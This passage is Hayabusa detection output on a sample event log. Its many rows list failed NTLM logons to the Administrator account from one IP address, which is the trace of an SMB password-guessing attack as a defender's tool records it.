01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 55l4HKICu8x0FpQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5GmlVWDjZ75tT08G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6v1DkuFvB04PESQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTLdNb0XbzXuLi51 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSjDYb1BhHC9UTxO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1yLH19VsfLx9BGF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4AVhjdz9yHsfss0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqWLOKaKwS8VBxDj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjK8A8DTSYursBzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaDCKPslwRaLBWtH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xAvoekviFDSAIgBe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:43.310 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3XOmFwh8IamESWCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 54GbW769j1x27mrI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bZSkhwZXc1SSknDT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 05AuqlN44x7oJGoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ4A6ReTVTcFCFeN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T7U6i4CMrL0bHouf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaeA4uZ6o8BRbzwf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MEnlL5BHmlCrtk7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KRNMpwAAaTsyzPfR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oBtHQkRWIoq5hfn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5pkk9lgqMQ4wxQel : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQVan7kRDOlnim50 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9282GqsC7UiUMbRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3lj7GjYryW9wjGgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:43.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPy4iUy5WBSLUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kvD9DEuos8SRrLH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NH1EnMG6fTvcz4QR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.131 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqHDXSQn8gkl2LJy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWI9XDDHjs2xcNB7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zo53mEz6nal5Gxff : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtOgC6wqMoNYVxId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdadoJYvD7DYjlSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:44.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U1xjdqjT9h0KUqG2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QfkzZBvO4onYx6JZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JqY8CvyODDLQV9Ps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPMRIxRVuh13jmZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jARkTWdKTfTIwlug : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zwhkc71Nfn7QDf7c : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qsYad9PgEajlYqvo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9YPw0DsspVbrOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wsHpLCOdAOPFM6nD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcNytOhGOZKaREL9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lc5boBVigHE1ccGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQXg4ZHdBYHyiTTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JebTJzyn91NrpvkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wCE5ypjEU5feEEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OglsROoqX48xm0gJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bNC9ES3l3KwXPxb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: byPavQuiscMm7CMW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQESAC3XpxCJJfG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5aYRnzirSj0PNXAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8s9xJ659geFHOlY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yBQdyO0diiFixwlx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzULtccOFnLIRiVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pDEGzqTAyUab5P8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gomgb26W9qFacRr7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXOcDu88S5c5VwwV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WHRnzgQkfAhsUguj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0Q9ZIaRK43W9apv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2xvriGeIlDwtzS36 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pDYTFqeJC61Nneef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0LNR7xCHW9x2q2qc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AE4EBj8X5IfXO8ZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BEOSGw6TjZf9GWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UCxe24uL4A6R9kgZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8v4DcIRkx43KCIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CY2buVupQ5oR1Cp5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f6c3MlpMEzkCVud2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2wV6op9AU4paDXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNn6aywSs67hVAO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wUa03SIX69WCIYbp : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zYi4TB42B2VQm5Tr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9mnUbGMnlrOR8Tv4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CJGMWqgmbXABdPvB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.344 